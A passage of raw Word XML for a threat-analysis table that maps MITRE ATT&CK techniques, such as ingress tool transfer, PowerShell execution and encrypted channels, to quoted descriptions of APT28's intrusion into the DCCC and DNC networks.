          <w:p w14:paraId="2F2ED38E" w14:textId="77777777" w:rsidR="00762933" w:rsidRPr="00105B0A" w:rsidRDefault="00762933" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00105B0A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Message Out/In</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C81EFB" w:rsidRPr="00B857D7" w14:paraId="026DF607" w14:textId="77777777" w:rsidTr="007D132F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50E4F59E" w14:textId="2A7E2F03" w:rsidR="00C81EFB" w:rsidRDefault="00C81EFB" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AAF7DE5" w14:textId="77777777" w:rsidR="00C81EFB" w:rsidRPr="00B857D7" w:rsidRDefault="00C81EFB" w:rsidP="007D132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30" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="397DAFAE" w14:textId="77777777" w:rsidR="00C81EFB" w:rsidRPr="00B857D7" w:rsidRDefault="00C81EFB" w:rsidP="007D132F">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1105 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25C978DC" w14:textId="20C0C533" w:rsidR="00C81EFB" w:rsidRPr="00B857D7" w:rsidRDefault="00237A9D" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D2E50CF" w14:textId="77777777" w:rsidR="00C81EFB" w:rsidRPr="00B857D7" w:rsidRDefault="00C81EFB" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34DEFA94" w14:textId="77777777" w:rsidR="00C81EFB" w:rsidRDefault="00C81EFB" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="693FD063" w14:textId="5F30F6F3" w:rsidR="00C81EFB" w:rsidRPr="00B857D7" w:rsidRDefault="00411B00" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="502A50E3" w14:textId="19173E14" w:rsidR="00C81EFB" w:rsidRPr="00842B32" w:rsidRDefault="00C81EFB" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] 28 </w:t>
            </w:r>
            <w:r>
              <w:t>To enable them to steal a large number of documents at once without detection, the Conspirators used a publicly available tool to gather and compress multiple documents on the DCCC and DNC networks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F0CF7" w:rsidRPr="00ED5880" w14:paraId="718A007C" w14:textId="77777777" w:rsidTr="007D132F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AE4392D" w14:textId="2440B0FC" w:rsidR="006F0CF7" w:rsidRPr="00ED5880" w:rsidRDefault="00061177" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00725941" w14:textId="77777777" w:rsidR="006F0CF7" w:rsidRPr="00ED5880" w:rsidRDefault="006F0CF7" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D0002F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D0002F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>000</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="00D0002F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D0002F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DD6C74A" w14:textId="77777777" w:rsidR="006F0CF7" w:rsidRPr="00ED5880" w:rsidRDefault="006F0CF7" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C5179A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1059.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C5179A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:PowerShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73A82FF5" w14:textId="348E0613" w:rsidR="006F0CF7" w:rsidRPr="00ED5880" w:rsidRDefault="00237A9D" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1644B9A6" w14:textId="77777777" w:rsidR="006F0CF7" w:rsidRPr="00ED5880" w:rsidRDefault="006F0CF7" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6592E1A8" w14:textId="77777777" w:rsidR="006F0CF7" w:rsidRPr="00ED5880" w:rsidRDefault="006F0CF7" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EE7C764" w14:textId="1386BEBA" w:rsidR="006F0CF7" w:rsidRPr="00ED5880" w:rsidRDefault="00411B00" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22B76AD4" w14:textId="19AB5008" w:rsidR="006F0CF7" w:rsidRPr="00ED5880" w:rsidRDefault="006F0CF7" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidRPr="00213821">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">APT28 has retrieved internal documents from machines inside victim environments, including by using </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00213821">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Forfiles</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00213821">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00D574E4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[3] </w:t>
            </w:r>
            <w:r w:rsidRPr="00213821">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>to stage documents before exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB171C" w:rsidRPr="00B857D7" w14:paraId="66235C38" w14:textId="77777777" w:rsidTr="00762933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="590CD073" w14:textId="085322F8" w:rsidR="00FB171C" w:rsidRDefault="001F1708" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00061177">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BA5BCD8" w14:textId="334F9EAB" w:rsidR="00FB171C" w:rsidRPr="00B857D7" w:rsidRDefault="006F0CF7" w:rsidP="008D2933">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0009 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="004A87FC" w14:textId="2CADD274" w:rsidR="00FB171C" w:rsidRPr="00B857D7" w:rsidRDefault="00213821" w:rsidP="008D2933">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1005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00213821">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Data from Local System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="464F7609" w14:textId="5C22ABBA" w:rsidR="00FB171C" w:rsidRPr="00B857D7" w:rsidRDefault="00237A9D" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7170068B" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00B857D7" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71B7F176" w14:textId="5E92B6D3" w:rsidR="00FB171C" w:rsidRDefault="006F0CF7" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38B73C85" w14:textId="328C180B" w:rsidR="00FB171C" w:rsidRPr="00B857D7" w:rsidRDefault="00411B00" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>AO-COL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68998F82" w14:textId="0EC0F948" w:rsidR="00FB171C" w:rsidRPr="001F1708" w:rsidRDefault="00213821" w:rsidP="00213821">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidRPr="00213821">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">APT28 has retrieved internal documents from machines inside victim environments, including by using </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00213821">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Forfiles</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00213821">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00D574E4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[3] </w:t>
            </w:r>
            <w:r w:rsidRPr="00213821">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>to stage documents before exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1708" w:rsidRPr="00B857D7" w14:paraId="3C084D2C" w14:textId="77777777" w:rsidTr="007D132F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65754AFA" w14:textId="29FAB2E3" w:rsidR="001F1708" w:rsidRDefault="001F1708" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00061177">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FCA4BFC" w14:textId="77777777" w:rsidR="001F1708" w:rsidRPr="00B857D7" w:rsidRDefault="001F1708" w:rsidP="007D132F">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430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6ED1E35A" w14:textId="31209EA5" w:rsidR="001F1708" w:rsidRPr="00B857D7" w:rsidRDefault="001F1708" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001F1708">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1573.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001F1708">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Encrypted Channel&gt;:Symmetric Cryptography</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="050BE79D" w14:textId="62AC80DC" w:rsidR="001F1708" w:rsidRPr="00B857D7" w:rsidRDefault="00237A9D" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34C12583" w14:textId="77777777" w:rsidR="001F1708" w:rsidRPr="00B857D7" w:rsidRDefault="001F1708" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70C8E442" w14:textId="77777777" w:rsidR="001F1708" w:rsidRDefault="001F1708" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65E9B7BA" w14:textId="7D430600" w:rsidR="001F1708" w:rsidRPr="00B857D7" w:rsidRDefault="00411B00" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21FE8385" w14:textId="340A4D54" w:rsidR="001F1708" w:rsidRPr="00105B0A" w:rsidRDefault="00213821" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r>
              <w:t>The Conspirators then used other GRU malware, known as “X-Tunnel,” to move the stolen documents outside the DCCC and DNC networks through encrypted channels.</w:t>
            </w:r>
            <w:r w:rsidRPr="00105B0A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="001F1708" w:rsidRPr="00105B0A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="001F1708" w:rsidRPr="001F1708">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>XTunnel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="001F1708" w:rsidRPr="001F1708">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> uses SSL/TLS and RC4 to encrypt traffic.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB171C" w:rsidRPr="00ED5880" w14:paraId="519977E1" w14:textId="77777777" w:rsidTr="00762933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55307645" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00F808AD" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F36241C" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00F808AD" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B14275B" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00F808AD" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F369816" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00F808AD" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
